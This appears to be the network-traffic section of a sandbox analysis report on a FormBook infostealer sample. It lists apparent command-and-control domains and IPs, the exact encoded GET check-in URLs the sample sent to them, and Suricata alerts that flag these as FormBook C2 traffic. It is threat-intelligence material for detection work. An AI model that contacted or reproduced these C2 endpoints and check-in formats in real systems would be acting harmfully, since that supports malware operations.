Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.chevalsk.com | 104.195.48.226 | |
www.clairewashere.site | 209.17.116.163 | |
www.kaka.digital | ||
www.entitysystemsinc.com | ||
www.cristinamadara.com |
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://www.chevalsk.com/nk6l/?ndiHKd=EaZkIt/dsbgGmtP3z3fG5X1OrV1k+ItimY3tDs5cepHzfg8Rj7GgJx6GdJ5RhaIBRqlzCCHC&1bj=jlK0MPU0w
REQUEST
RESPONSE
BODY
GET /nk6l/?ndiHKd=EaZkIt/dsbgGmtP3z3fG5X1OrV1k+ItimY3tDs5cepHzfg8Rj7GgJx6GdJ5RhaIBRqlzCCHC&1bj=jlK0MPU0w HTTP/1.1
Host: www.chevalsk.com
Connection: close
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.6.40
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2021 01:16:35 GMT
Connection: close
Content-Length: 1296
GET
400
http://www.clairewashere.site/nk6l/?ndiHKd=Dos/SRlugC4+vL8SY+lT6eayun6OXC9NQ0dHCaF9xdDTN/3HMO23XGTYqHWsARQsOO5DUhg+&1bj=jlK0MPU0w
REQUEST
RESPONSE
BODY
GET /nk6l/?ndiHKd=Dos/SRlugC4+vL8SY+lT6eayun6OXC9NQ0dHCaF9xdDTN/3HMO23XGTYqHWsARQsOO5DUhg+&1bj=jlK0MPU0w HTTP/1.1
Host: www.clairewashere.site
Connection: close
HTTP/1.1 400 Bad Request
Server: openresty/1.17.8.2
Date: Mon, 11 Oct 2021 01:17:20 GMT
Content-Type: text/html
Content-Length: 163
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49207 -> 209.17.116.163:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49207 -> 209.17.116.163:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49207 -> 209.17.116.163:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49206 -> 104.195.48.226:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49206 -> 104.195.48.226:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49206 -> 104.195.48.226:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts